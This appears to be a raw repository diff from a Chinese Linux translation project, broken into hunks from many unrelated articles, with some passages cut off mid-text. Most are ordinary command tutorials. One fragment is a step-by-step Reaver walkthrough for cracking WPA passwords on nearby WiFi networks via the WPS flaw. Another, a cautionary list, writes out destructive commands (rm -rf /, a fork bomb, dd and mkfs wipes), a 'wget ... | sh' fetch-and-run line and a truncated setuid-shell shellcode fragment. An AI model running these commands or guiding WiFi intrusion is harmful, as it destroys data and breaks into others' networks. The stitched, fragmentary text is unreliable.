### 如何显示hostname的更多细节信息###
$ hostname -i
$ hostname -d
$ hostname -s
$ hostname -f
所有的参数包括上述信息,都可以通过使用参数**-v** 和 **-d** 来概括。让我们来看一个例子。
$ hostname -v -d
Resolving ‘dev-machine.bris.co.id’ …
Result: h_name=’dev-machine.bris.co.id’
Result: h_aliases=’dev-machine’
Result: h_addr_list=’’
觉得熟悉吗?没错,运行结果与上面提到的 **dnsdomainname -v** 命令式相同的。
via: http://linoxide.com/linux-command/display-set-hostname-linux/
译者:[Vic___](http://blog.csdn.net/Vic___) 校对:[Caroline](https://github.com/carolinewuyan)
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- [**The BackTrack 5 Live DVD**][4]。BackTrack是一款支持自启动的Linux发行版,上面集成了大量的网络测试工具。虽然这对于安装、配置Reaver并不是必需的一个条件,但是对于大多数用户却是最简单一个方法。从[BackTrack的下载页面(传送门)][5]下载Live DVD,然后刻盘。这里你也可以下载镜像然后使用VMware安装,如果你不知道VMware是啥,额,那就还是刻盘吧。如图所示,下载的时候,下拉菜单选择BackTrack 5 R3版本、Gnome环境、根据你的CPU选择32或64位系统(如果这里不确定是32还是64,为了保险起见,请选择32位),下载类型选择ISO,然后就可以点击下载了。
- **配有DVD光驱、支持WiFi的电脑**。BackTrack支持大多数的笔记本无线网卡,这一点对于大多数读者应该没什么问题。同时,你的电脑需要有一个DVD光驱,这样才能从BackTrack光盘启动。我的测试环境是一台用了6年的MacBook Pro。
- **附近要有采用WPA加密的WiFi网络**。没WiFi网,你破解谁去 =。= ……一会我会在“Reaver的工作原理部分”介绍,WiFi防护设置是如何产生安全漏洞、WPA破解是如何成为可能的。
- **最后,你还需要一点点的耐心**。这是整个实验的最后一步,使用Reaver破解WPA密码并不难,它采用的是暴力破解,因此,你的电脑将会测试大量不同的密码组合,来尝试破解路由器,直到最终找到正确的密码。我测试的时候,Reaver花了大概两个半小时破解了我的WiFi密码。[Reaver的主页][6]上介绍,一般这个时间在4到10个小时之间,视具体情况而定。
要启动BackTrack,只需将DVD放入光驱,电脑从光盘启动。(如果不知道如何使用live CD或DVD启动,请自行Google。)启动过程中,BackTrack会让你选择启动模式,选择默认的“BackTrack Text - Default Boot Text Mode”然后回车。
Reaver已经加入了BackTrack的最新版软件包,只是还没有集成到live DVD里,所以,在本文最初撰写的时候,你还需要手动安装Reaver。要安装Reaver,首先设置电脑联网。
1.点击Applications > Internet > Wicd Network Manager
连上网以后,安装Reaver。点击菜单栏里的终端按钮(或者依次点击 Applications > Accessories > Terminal)。在终端界面,键入以下命令:
apt-get update
apt-get install reaver
如果一切顺利,Reaver现在应该已经安装好了。如果你刚才的下载安装操作使用的是WiFi上网,那么在继续下面的操作之前,请先断开网络连接,并假装不知道WiFi密码 =。= 接下来我们要准备破解它~

airmon-ng start wlan0

airodump-ng wlan0
(注意:如果`airodump-ng wlan0`命令执行失败,可以尝试对监控接口执行,例如`airodump-ng mon0`)

在终端中执行下列命令,用你实际获取到的BSSID替换命令中的 `bssid` :
reaver -i moninterface -b bssid -vv
例如,如果你和我一样,监控接口都叫做 `mon0`,并且你要破解的路由器BSSID是`8D:AE:9D:65:1F:B2`,那么命令应该是下面这个样子:
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv

除此以外,你可以在Reaver运行的任意时候按下Ctrl+C中断工作。这样会退出程序,但是Reaver下次启动的时候会自动恢复继续之前的工作,前提是只要你没有关闭或重启电脑(如果你直接在live DVD里运行,关闭之前的工作都会丢失)。
你已经学会了使用Reaver,现在,让我们简单了解一下Reaver的工作原理。它利用了WiFi保护设置(WiFi Protected Setup - 下文中简称为WPS)的一个弱点,WPS是许多路由器上都有的一个功能,可以为用户提供简单的配置过程,它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码的一个缺陷,最终的结果就是,只要有足够的时间,它就能破解WPA或WPA2的密码。
关于这个缺陷的具体细节,参看[Sean Gallagher's excellent post on Ars Technica][8]。
> 在一次电话通话中,Craig Heffner说道,很多路由器即使关闭WPS都无法有效防范攻击。他和同事一起测试过,所有的Linksys和Cisco Valet无线路由器都是如此。“在所有的Linksys路由器上,你甚至无法手动关闭WPS,”他说,尽管Web界面中有关闭WPS配置的按钮,但是“它仍然会自动打开,极易受到攻击”。
via: http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
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published/How to setup EPEL repository on CentOS 5 or 6.md
Normal file
published/How to setup EPEL repository on CentOS 5 or 6.md
Normal file
@ -0,0 +1,100 @@
如何在CentOS 5/6上安装EPEL 源
EPEL 是什么?
EPEL (Extra Packages for Enterprise Linux,企业版Linux的额外软件包) 是Fedora小组维护的一个软件仓库项目,为RHEL/CentOS提供他们默认不提供的软件包。这个源兼容RHEL及像CentOS和Scientific Linux这样的衍生版本。
更多关于EPEL 项目的细节可以到以下网站获取:[https://fedoraproject.org/wiki/EPEL][1]
> 提示 - RHEL/CentOS系统有许多第三方源,比较流行的比如RpmForge,RpmFusion,EPEL,Remi等等。
> 然而需要引起注意的是,如果系统添加了多个第三方源,可能会因此产生冲突——一个软件包可以从多个源获取,一些源会替换系统的基础软件包,从而可能会产生意想不到的错误。已知的就有Rpmforge与EPEL会产生冲突。
> 对于这些问题我们建议,调整源的优先权或者有选择性的安装源,但是这需要复杂的操作,如果你不确定如何操作,我们推荐你只安装一个第三方源。
## 在CentOS 上安装EPEL ##
根据你的CentOS 版本来选择正确的下载地址。
请注意EPEL 的安装包是独立编译的,所以它可以安装在32位和64位系统中。
### 1. 确认你的CentOS 的版本 ###
首先通过以下命令确认你的CentOS 版本
$ cat /etc/redhat-release
CentOS release 6.4 (Final)
### 2. 下载EPEL 的rpm 安装包 ###
现在从上面的地址下载CentOS 版本所对应的EPEL 的版本
$ wget http://download.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm
### 3. 安装EPEL ###
通过以下命令安装EPEL 软件包
$ sudo rpm -ivh epel-release-6-8.noarch.rpm
$ sudo rpm -ivh epel-release*
### 5. 检查EPEL 源 ###
安装好EPEL 源后,用yum 命令来检查是否添加到源列表
# yum repolist
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
* base: mirrors.vonline.vn
* epel: buaya.klas.or.id
* extras: centos-hn.viettelidc.com.vn
* updates: mirrors.fibo.vn
repo id repo name status
base CentOS-6 - Base 6,381
epel Extra Packages for Enterprise Linux 6 - x86_64 10,023
extras CentOS-6 - Extras 13
nginx nginx repo 47
updates CentOS-6 - Updates 1,555
repolist: 18,019
EPEL已经在repo 后列出,并且显示提供了上万个软件包,所以EPEL 已经安装到你的CentOS了。
EPEL源的配置安装到了 **/etc/yum.repos.d/epel.repo** 文件。
现在来试一下从EPEL 获取软件包
$ sudo yum install htop
via: http://www.binarytides.com/setup-epel-repository-centos/
译者:[NearTan](https://github.com/NearTan) 校对:[wxy](https://github.com/wxy)
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@ -0,0 +1,51 @@
Linux Uptime 命令,让你知道你的系统运行了多久

在Linux 下,我们可以使用uptime 命令,而且此命令不必使用root 权限。uptime 命令在系统中已经默认安装了。
$ uptime

这些信息保存在/proc/uptime 文件中,虽然是以文本方式保存,但是这些数据却不能直接显示,这就需要我们使用uptime 命令来翻译它。
以下是如何解读uptime 提供的信息:
### 系统时间 ###
### 系统运行时间 ###
第二条信息**Up 1004 days, 12:20**,这是显示你的系统运行时间。图1 显示你的系统已经运行了1004天12小时20分钟,如果你的系统没有运行超过24小时,这里将只会显示小时分钟或者只显示分钟。注意图2、图3的信息,当系统重启后将会清零。


### 已登录用户的数量 ###
第三部分的信息是显示已登陆用户的数量。在图1中,显示的是**1 user** ,即当前登录用户数量。当多个用户在同时登陆系统时,uptime 命令将告诉你用户的数量。
### 平均负载量 ###
最后一个信息是系统的平均负载量。回到图1,你看到这样带两位小数的数字**0.25, 0.25, 0.19**可以换算成百分比,即0.25和0.19分别代表着25%和19%。0.25, 0.25, 0.19分别代表着过去1分钟、5分钟、15分钟系统的平均负载量。负载量越低意味着你的系统性能越好。
这就是**uptime** 命令的日常使用指导,如果想获取更详细的信息,请通过输入**man uptime** 进入uptime 命令的manual 页面来查看。
via: http://linoxide.com/linux-command/linux-uptime-command/
译者:[NearTan](https://github.com/NearTan) 校对:[Caroline](https://github.com/carolinewuyan)
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@ -1,12 +1,12 @@
欧洲议会:NSA曾要求Linus Torvalds允许他们在Linux中植入后门

*照片中为大神Linus(左)和Benjamin Humphrey(译者注:该小伙儿为本文原文出处‘OMG!Ubuntu!’的联合创始人之一,现已离开OMGUbuntu)!照片摄于2011年*
美国国家安全局([**NSA**][1])宣称,他们曾经要求Linux的创始人,Linus Torvalds,在GNU/Linux中建立一个他们可以访问的“后门”。
美国国家安全局([**NSA**][1])被称,他们曾经要求Linux的创始人,Linus Torvalds,在GNU/Linux中建立一个他们可以访问的“后门”。
这绝非谣言,Linus的父亲,Nils Torvalds如此说道。
这绝非谣言,Linus的父亲,Nils Torvalds如此说道。(译注:也许Nils可以算做是Linux的祖父?好吧,我是标题党,啦啦啦~ :D 无论如何,感谢他生了一个好儿子! )
@ -11,6 +11,7 @@
via: http://www.unixmen.com/play-crossword-game-adobes-leaked-passwords/
@ -50,8 +50,8 @@ Recoll可以从Dash或者菜单中启动。
1. 索引配置
2. 索引计划
@ -118,6 +118,7 @@ Recoll支持两种索引计划:
如有问题,请参考我们的Q/A论坛 : http://ask.unixmen.com/ 。
via: http://www.unixmen.com/recoll-text-searching-tool-linux-desktops/
@ -62,19 +62,19 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以

### General ###
#### General选项卡 ####
在 General 选项内,你可以选择多久进行一次完整备份,默认是7天。每7天 SBackup 将会进行一次完整的备份。你也可以选择备份的压缩格式。

### Include ###
#### Include选项卡 ####
这个选项不需要解释太多,你可以添加 SBackup 要备份的文件或目录。这里可以选择备份单独的文件或者完整的目录,我删除了所有的目录仅仅保留了“Resume”

### Exclude ###
#### Exclude选项卡 ####
如同 Include 选项,我们可以选择备份时排除的文档和目录,只需要选择要排除的文档和目录的路径即可。在默认配置下,/media, /var/run/, /var/cache/, /var/spool/ 和 /vat/tmp/ 目录均被排除
@ -92,7 +92,7 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以

### Destination ###
#### Destination选项卡 ####
在这里你可以选择备份存放的路径,正如我之前提到的,你可以把备份的文档或文件夹存放在硬盘或者远程的 FTP 或 NAS。这里我将把备份保存在 /home/sk/My Backup 目录下。
@ -100,7 +100,7 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以
**提示:** 在备份前确认目录有足够的空间保存备份文件
### Schedule ###
#### Schedule选项卡 ####
在这个选项中,你可以设定具体的备份时间。点击 **Simple** 选项,可以按每小时、每日、每周、每月来设置你的计划备份时间。
@ -114,13 +114,13 @@ SBackup 可在 Ubuntu、Linux Mint 和 Debian 的默认仓库中获得,所以
lrwxrwxrwx 1 root root 33 Nov 8 15:34 /etc/cron.daily/sbackup -> /usr/share/sbackup/sbackup-launch
### Purging ###
#### Purging选项卡 ####

### Report ###
#### Report选项卡 ####
Report 是最后一个选项卡,在这里你可以设置接收备份完成通知的邮箱。输入你的邮箱ID、SMTP服务地址、邮箱用户名、密码后,点击 Test mail settings。需要留意的是,在测试邮箱设置前,点击工具栏中的Save Configuration按钮保存你的配置。
@ -1,19 +1,14 @@
VidMasta: A Desktop Application For Searching Movies And TV Shows
Ever wanted to search for a Movie or a TV shows from your desktop or searching for a application to do it for you whenever you want? Here is a application to fulfil your needs.
[**VidMasta**][1] is free, cross-platform, federated search desktop application to read about, preview, watch, and download any movie or television titles that are being shared online. It will run on Linux, Windows and Mac OS X.
[**VidMasta**][1]是一个免费的、跨平台的的应用,它将搜索、浏览、评论、观看和下载那些在线分享的视频和电视剧等功能融为一体。它可以运行在Linux、Windows和Mac OS X上。
- 观看或下载任何格式的电影或电视剧
- 支持的格式是:TV,DVD,720P,1080P。
- 匿名链接并自动过滤不受信任的IP,可以使用代理,还可以使用加密连接。
@ -34,8 +29,7 @@ Ever wanted to search for a Movie or a TV shows from your desktop or searching f
sudo java -jar vidmasta-setup-16.7.jar
@ -89,7 +83,9 @@ Ever wanted to search for a Movie or a TV shows from your desktop or searching f
@ -97,7 +93,7 @@ Ever wanted to search for a Movie or a TV shows from your desktop or searching f
via: http://www.unixmen.com/vidmasta-desktop-application-searching-movies-tv-shows/
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@ -1,103 +0,0 @@
翻译中 Luox
10 Most Dangerous Commands – You Should Never Execute on Linux
Linux command line is productive, useful and interesting but sometimes it may be very much dangerous specially when you are not sure what you are doing. This article is not intended to make you furious of **Linux** or **Linux command** line. We just want to make you aware of some of the commands which you should think twice before you execute them.

### 1. rm -rf Command ###
The **rm -rf** command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with **rm command** are.
- **rm** command in Linux is used to delete files.
- **rm -r** command deletes the folder recursively, even the empty folder.
- **rm -f** command removes ‘Read only File’ without asking.
- **rm -rf /** : Force deletion of everything in root directory.
- **rm -rf ** * : Force deletion of everything in current directory/working directory.
- **rm -rf .** : Force deletion of current folder and sub folders.
Hence, be careful when you are executing **rm -rf** command. To overcome accidental delete of file by ‘**rm**‘ command, create an alias of ‘**rm**‘ command as ‘**rm -i**‘ in “**.bashrc**” file, it will ask you to confirm every deletion.
### 2. :(){:|:&};: Command ###
The above is actually a **fork bomb**. It operates by defining a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.
### 3. command > /dev/sda ###
The above command writes the output of ‘**command**‘ on the block **/dev/sda**. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.
### 4. mv folder /dev/null ###
The above command will move ‘**folder**‘ to **/dev/null**. In Linux **/dev/null** or **null** device is a special file that discards all the data written to it and reports that write operation succeed.
# mv /home/user/* /dev/null
The above command will move all the contents of a **User** directory to **/dev/null**, which literally means everything there was sent to **blackhole (null)**.
### 5. wget http://malicious_source -O- | sh ###
The above command will download a script from a malicious source and then execute it. Wget command will download the script and **sh** will execute the downloaded script.
**Note**: You should be very much aware of the source from where you are downloading packages and scripts. Only use those scripts/applications which is downloaded from a trusted source.
### 6. mkfs.ext3 /dev/sda ###
The above command will format the block ‘**sda**’ and you would surely be knowing that after execution of the above command your Block (**Hard Disk Drive**) would be new, **BRAND NEW!** Without any data, leaving your system into unrecoverable stage.
### 7. > file ###
The above command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> **xt.conf**” will write the configuration file or any other system or configuration file.
### 8. ^foo^bar ###
This command, as described in our [10 Lesser Known Linux Commands][1], is used to edit the previous run command without the need of retyping the whole command again. But this can really be troublesome if you didn’t took the risk of thoroughly checking the change in original command using **^foo^bar** command.
### 9. dd if=/dev/random of=/dev/sda ###
The above command will wipe out the block **sda** and write random junk data to the block. Of-course! Your system would be left at inconsistent and unrecoverable stage.
### 10. Hidden the Command ###
The below command is nothing but the first command above (**rm -rf**). Here the codes are hidden in **hex** so that an ignorant user may be fooled. Running the below code in your terminal will wipe your **root** partition.
This command here shows that the threat may be hidden and not normally detectable sometimes. You must be aware of what you are doing and what would be the result. Don’t compile/run codes from an unknown source.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
**Note**: Don’t execute any of the above command in your **Linux** terminal or shell or of your friend or school computer. If you want to test them, run them in virtual machine. Any in-consistence or data loss, due to the execution of above command will break your system down for which, neither the **Author** of the article nor **Tecmint** is responsible.
That’s all for now. I will soon be here again with another interesting article you people will love to read. Till then Stay tuned and connected to **Tecmint**. If you know any other such **Dangerous Linux Commands** and you would like us to add to the list, please tell us via comment section and don’t forgot to give your value-able feedback.
via: http://www.tecmint.com/10-most-dangerous-commands-you-should-never-execute-on-linux/
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@ -1,4 +1,4 @@
[DONING]BY FingerLiu
[this is bazz2]
10 basic examples of linux netstat command
### Netstat ###
@ -1,210 +0,0 @@
13 Linux Cat Command Examples To Manage (Display,Sort,Create etc) Files

In Linux operating system most of configuration files, logs even shell scripts are in text file format. There is why we have numbers of text editors in Linux. When you just need to see the content of those files, you can use a simple command named cat.
From cat manual page it says
> cat is a command that concatenate files and print on the standard output
Cat is built-in command in Linux. I believe that all of Linux distribution has this Cat command by default. Let’s start to use how to use it.
### 1. View the content of file ###
The easiest way to use cat is just type ‘cat file_name’.
# cat /etc/issue
CentOS release 5.10 (Final)
Kernel \r on an \m
### 2. Put the line number on the fly ###
When reading a configuration file it may that you have a long configuration file. It will be easier to if you can put line numbers on the fly. Use -n parameter to fulfill this purpose.
# cat -n /etc/ntp.conf
1 # Permit time synchronization our time resource but do not
2 # permit the source to query or modify the service on this system
3 restrict default kod nomodify notrap nopeer noquery
4 restrict -6 default kod nomodify notrap nopeer noquery
6 # Permit all access over the loopback interface. This could be
7 # tightened as well, but to do so would effect some of the
8 # administration functions
9 restrict
10 restrict -6 ::1
### 3. Number non-blank output lines ###
Similar with -n parameter, -b parameter will give you numbers **on the fly**. The difference is -b parameter will only number non-blank lines.
#cat -n /etc/ntp.conf
1 # Permit time synchronization our time resource but do not
2 # permit the source to query or modify the service on this system
3 restrict default kod nomodify notrap nopeer noquery
4 restrict -6 default kod nomodify notrap nopeer noquery
5 # Permit all access over the loopback interface. This could be
6 # tightened as well, but to do so would effect some of the
7 # administration functions
8 restrict
9 restrict -6 ::1
### 4. Show tabs ###
You may need to know where are the tabs on your text file. If you do, you can use -T parameter. Tab will be represented by **^I** characters.
# cat -T /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
||||^I^Ilocalhost.localdomain localhost
::1^I^Ilocalhost6.localdomain6 localhost6
### 5. Show the end of lines ###
-E parameter will display **$** at end of each line. Here’s the example :
# cat -E /etc/hosts
# Do not remove the following line, or various programs$
# that require network functionality will fail.$
|||| localhost.localdomain localhost$
::1 localhost6.localdomain6 localhost6$
### 6. Show All ###
If you want to combine between -T and -E, you can use -A parameter.
# cat -A /etc/hosts
# Do not remove the following line, or various programs$
# that require network functionality will fail.$
||||^I^Ilocalhost.localdomain localhost$
::1^I^Ilocalhost6.localdomain6 localhost6$
### 7. View the content per page ###
When your file can not fit in your screen, you can **combine** cat with another command to make it displayed per page. Use the pipe ( | ) sign to combine it.
# cat /proc/meminfo | less
# cat /proc/meminfo | more
The difference between less and more is that you can do scroll up **and** scroll down **on less command** using PageUp and PageDown buttons. While you can **only** do scroll down **on more command** using spacebar.
### 8. View the contents of 2 files ###
Let’s say we have 2 text files named linux and desktop located in /root folder. Each of files contains :
**Linux** : ubuntu, centos, redhat, mint and slackware
**Desktop** : gnome kde, xfce, enlightment, and cinnamon
When you want to view more than 1 file simultaneously, you do like this :
# cat /root/linux /root/desktop
### 9. Sorting file ###
Again, you can combine cat using another command to make a custom output. If you want to sort it, you can combine it with **sort** command. Here’s the example :
# cat /root/linux | sort
### 10. Redirect standard output ###
You can also redirect the output to screen or to another file. Just use > sign (greater-than symbol) if you want to redirect the output into a file.
# cat /root/linux > /root/linuxdistro
The above command will **create** a linuxdistro file that has the same content with /root/linux file.
### 11. Creating a new file ###
There are some ways to create a text file in Linux. One of them is using cat command.
# cat > operating_system
When you type cat > operating system, it will create a file which named operating_system. Then you will see a blank line below the cat command. You can type the content that you want. We typed Unix, Linux, Windows and MacOS for example. When you’re done, **press Ctrl-D** to save the content and exit from cat command. You will see **a file named operating_system** is created in the current folder with the content that you add before.
### 12. Append the content of file ###
If you use the > sign twice, it means that the content of the first file will be added to the second file. Let’s see the example :
# cat /root/linux >> /root/desktop
# cat /root/desktop
The first cat command will add the content of /root/linux to /root/desktop file
The second command will show you this output :
### 13. Redirect standard input ###
You can also redirect standard input using **<** sign (less-than symbol).
# cat < /root/linux
The above command means that /root/linux will be an input for cat command. The output will be like this :
To make it clearer, let’s see another example :
# cat < /root/linux | sort > linux-sort
That command will be read : **sort content from /root/linux file then print the output to linux-sort file**
So the output of linux-sort file will be like this :
That’s some examples of cat command on day-to-day operation. Of course you can explore more detail from cat manual page and experiment with Input-Output redirection operator.
via: http://linoxide.com/linux-command/13-cat-command-examples/
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sources/Are Open Source Developers Too Demanding.md
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sources/Are Open Source Developers Too Demanding.md
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@ -0,0 +1,70 @@
Are Open Source Developers Too Demanding?
**Open source invites participation, including criticism. But do developers sometimes take it too far?**

Developers can be a fickle bunch. Gifted with mountains of free, open-source code of ever-improving quality, some developers can’t help but complain that there’s not more, and even more free, software. But the problem often isn't the code itself, but poorly calibrated expectations and scanty training.
### What? Me Pay? ###
One sometimes unrealistic expectation is that software should be free. All of it.
So, for example, we have [one young developer berating nginx][1] for building “admittedly amazing software” but then having the audacity to charge for it.
No, really. Those nginx people are trying to make money by writing software that people want. Can you believe the gall?
Actually, his problem is more nuanced than this. Despite electing not to use Apache httpd, the Hip Young Startup blog author complains that nginx "took a feature that Apache httpd has had literally forever and put it behind a pay wall." It's unclear why he doesn't just use Apache to solve his problem, given that he also says "the performance difference between nginx and httpd in this scenario is negligible."
Or maybe he could fix nginx himself, given that, by his own admission, it's "trivial" to make the changes himself to get around nginx's attempts to sustain product development by charging for some features. The problem, as he acknowledges, is that he "shouldn’t have to do any of this [crap]."
In other words, the world (or nginx) owes this developer a living. Who knew?
Let's be clear: one of the ways open source succeeds is by dramatically lowering the bar to adoption. Charging money, even a negligible fee, can hinder that adoption. But getting uppity about the primary developer of an open-source project charging money for value? As programmer Brendan Loudermilk ([@bloudermilk][2]) [tells][3] the Hip Young Startup blogger, "You could always pay for and support the software that serves as a core dependency of your app."
Imagine that.
### Documentation? Of Course I Didn’t Read The Documentation! ###
Then there are the countless others who take to Hacker News to complain about software they often don’t understand, quite often because they haven’t bothered to read the documentation. I completely get that great software should be approachable, and great products, generally, should be somewhat self-explanatory.
But much of the best open-source software can be complex to run, at least, at scale. If the software isn't working for someone, it's not obvious that the software is the problem. Vlad Mihalcea, founder of the Struts open-source framework, nails this, [arguing][4] that “if there is someone to blame, it’s usually us” as much of the available open-source software tends to be high-quality code.
What it isn’t, he goes on to argue, is a free lunch in terms of a learning curve. Any software, whether open source or proprietary, requires some investment in learning how to be productive with it. As he notes of Hibernate and other open-source technologies, “If you want to employ them [successfully], be prepared to learn a lot. There is no other way.”
This won’t resonate with the hacker crowd whose first instinct is to complain when software doesn’t work the way they want, even if it wasn’t designed to do what they want it to do. But it’s true, all the same.
### Healthcare.gov Vs. Gov.UK ###
Just look at the Healthcare.gov debacle for proof. Recently NoSQL database vendor MarkLogic has been [taking bullets][5] over its alleged role in Healthcare.gov’s many technical problems. [Some have gone so far as to argue][6] that NoSQL databases, in general, are faulty because of the Healthcare.gov debacle.
This is stupid.
MarkLogic is a fine database. While not perfect, it’s silly to blame Healthcare.gov’s problems on this legacy database. Code isn’t the primary problem.
As [I’ve argued][7], Healthcare.gov’s problems aren’t really about code, but instead about process. For proof, look no further than Healthcare.gov’s British peer, Gov.UK, [which credits NoSQL technologies][8] as a significant reasons for its success.
The difference isn’t in the code the two websites used, but rather their respective approaches: Gov.UK is iterative, agile. Healthcare.gov is top-down, waterfall.
### A Poor Craftsman Blames Her Tools ###
Open source invites criticism by laying bare its strengths and weaknesses in a way proprietary software never did. Developers today have a level of accessibility to the code they use that previous generations of developers lacked, with a megaphone (the Internet) that allows them to broadcast complaints about that code.
But let’s not lose sight of just how blessed we are to have this code, or forget our obligation to apply it appropriately in order to be successful. In other words, read the documentation before you complain that open-source software doesn’t “work.” More often than not, it works just fine, but not for the ill-conceived purpose you have in mind.
via: http://readwrite.com/2013/11/26/are-open-source-developers-too-demanding#awesm=~ooy2qPfuR2PvIx
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@ -1,3 +1,5 @@
translated by coolpigs
Basic Linux Interview Questions and Answers – Part II
Continuing the Interview Series, we are giving 10 Questions here, in this article. These questions and the questions in the future articles doesn’t necessarily means they were asked in any interview. We are presenting you an interactive learning platform through these kind of posts, which surely will be helpful.
sources/Built in Audit Trail Tool – Last Command in Linux.md
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sources/Built in Audit Trail Tool – Last Command in Linux.md
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Built in Audit Trail Tool – Last Command in Linux

If you are working as a server administrator, you may understand that you have to protect your server. Not only from the outside, but you have to protect it from the inside. Linux has one built-in command to see who is the last logged in user into your server.
The command is **last**. This command is **very useful for audit trail**. Let’s start to see what can last to do for you.
### What is the function of Last command ###
**Last** display a list of all user logged in (and out) from **/var/log/wtmp** since the file was created. This file is binary file which cannot view by text editor such as Vi, Joe or another else. This trick is pretty smart because user (or root) can not modify the file as they want.
Last gives you information the name of all users logged in, its tty, IP Address (if the user doing a remote connection) date – time, and how long the user logged in.
### How to run Last ###
You just need to type **last** on your console. Here’s the sample :
$ last
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in
reboot system boot 2.6.32-358.23.2 Mon Dec 2 09:20 - 13:25 (04:05)
Here’s how to read last information :
- The first column tell who are the user
- The second column give us information about how the user is connected
> pts/0 (pseudo terminal) means that the user connect via remote connections such as SSH or telnet
> tty (teletypewriter) means that the user connect via direct connection to the computer or local terminal
> Exception for reboot activity the status will be shown is system boot
- The third column **show where the user come from**. If the user connect from remote computer, you will see a hostname or an IP Address. If you see :0.0 or nothing it means that the user is connect via local terminal. Exception for reboot activity, the kernel version will be shown as the status
- The remaining columns display **when the log activity has happened**. Numbers in the bracket tell us how many hours and minutes the connection was happened
### Some examples of Last command on day-to-day operation ###
#### Limit the number of line shown ####
When you have a lot of lines to show, you can limit how many lines do you want to see. Use **-n parameter** to do it.
$ last -n 3
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in
reboot system boot 2.6.32-358.23.2 Mon Dec 2 09:20 - 13:25 (04:05)
**-n parameter** will make last command to display 3 lines starting from the current time and backwards
#### Don’t display the hostname ####
Use **-R parameter** to do is. Here’s the sample :
$ last -R
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in
reboot system boot Mon Dec 2 09:20 - 13:25 (04:05)
As you see, now there is no information about hostname or IP Address
#### Display the hostname in the last column ####
To do this, we can use **-a parameter**
$ last -a
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki tty1 Mon Dec 2 09:31 still logged in :0.0
reboot system boot Mon Dec 2 09:20 - 13:25 (04:05) 2.6.32-358.23.2.el6.i686
Now the hostname information such as will be placed in the last column.
#### Print full login and logout time and dates ####
You can use **-F parameter** for this. Here’s a sample.
$ last -F
leni pts/0 Mon Dec 2 12:32:24 2013 – Mon Dec 2013 13:25:24 2013 (00:53)
#### Print specific user name ####
If you want to trace specific user, you can print it specifically. Put the name of user behind last command.
$ last leni
leni tty1 Mon Dec 2 18-42 still logged in
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
Or if you want to know when **reboot** is done, you can also display it
$ last reboot
reboot system boot Mon Dec 2 09:20 - 16:55 (07:34)
reboot system boot Sun Dec 1 04:26 - 04:27 (00:01)
reboot system boot Wed Nov 27 20:27 - 01:24 (04:57)
reboot system boot Tue Nov 26 21:06 - 06:13 (09:06)
#### Print spesific tty / pts ####
Last can also print information about specific tty / pts. Just put the tty name or pty name behind the last command. Here are some sample outputs :
$ last tty1
pungki tty1 Mon Dec 2 09:31 still logged in
pungki tty1 Mon Dec 2 04:26 – down (00:00)
pungki tty1 Mon Dec 2 04:07 – down (00:00)
pungki tty1 Sun Dec 1 18:55 – 04:07 (09:12)
$ last pts/0
leni pts/0 Mon Dec 2 12:32 - 13:25 (00:53)
pungki pts/0 :0.0 Wed Nov 27 20:28 – down (04:56)
When you see **down value** – such as the second line above – , it means that the user was logged in from specific time until the system is reboot or shutdown.
#### Use another file than /var/log/wtmp ####
By default, last command will parse information from **/var/log/wtmp**. If you want t**he last command** parse from another file, you can use **-f parameter**. For example, you may rotate the log after a certain condition. Let’s say the previous file is named **/var/log/wtmp.1** . Then the last command will be like this.
$ last -f /var/log/wtmp.1
#### Display the run level changes ####
There is **-x parameter** if you want to display run level changes. Here’s a sample output :
pungki tty1 Mon Dec 2 19:21 still logged in
runlevel (to lvl 3) 2.6.32-358.23.2 Mon Dec 2 19:20 – 19:29 (00:08)
reboot system boot 2.6.32-358.23.2 Mon Dec 2 19:20 – 19:29 (00:08)
shutdown system down 2.6.32-358.23.2 Mon Dec 2 18:56 – 19:20 (00:23)
runlevel (to lvl 0) 2.6.32-358.23.2 Mon Dec 2 18:56 – 18:56 (00:00)
leni tty1 Mon Dec 2 18:42 – down (00:00)
You can see that there are two entries of run level. Runlevel which has **to lvl 3** entry means the system is running on full console mode. No active X Window or GUI. Meanwhile, when the system is **shutdown**, Linux us **run level 0**. That’s why last show you **to lvl 0** entry
#### View bad logins ####
While **last** command logs successful logins, then **lastb** command **record failed login attempts**. You **must have root** access to run lastb command. Here’s a sample output from lastb command. Lastb will parse information from /var/log/btmp.
# lastb
leni tty1 Mon Dec 2 22:12 – 22:12 (00:00)
rahma tty1 Mon Dec 2 22:11 – 22:11 (00:00)
#### Rotate the logs ####
Since **/var/log/wtmp** record every single log in activities, the size of the file may grow quickly. By default, Linux will **rotate /var/log/wtmp** every month. The detail of rotation activity is put in /etc/logrotate.conf file. Here’s the content of my **/etc/logrotate.conf** file.
/var/log/wtmp {
create 0664 root umtp
minsize 1M
rotate 1
And for **/var/log/btmp**, here’s default configuration of rotate activity
/var/log/btmp {
create 0600 root umtp
minsize 1M
rotate 1
### Conclusion ###
You can combine those parameters to custom the output of last and lastb. All parameter **which run on last** command, **also run on** lastb command. For more detail, please visit last manual page by typing **man last** on your console.
via: http://linoxide.com/linux-command/linux-last-command/
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@ -1,14 +1,16 @@
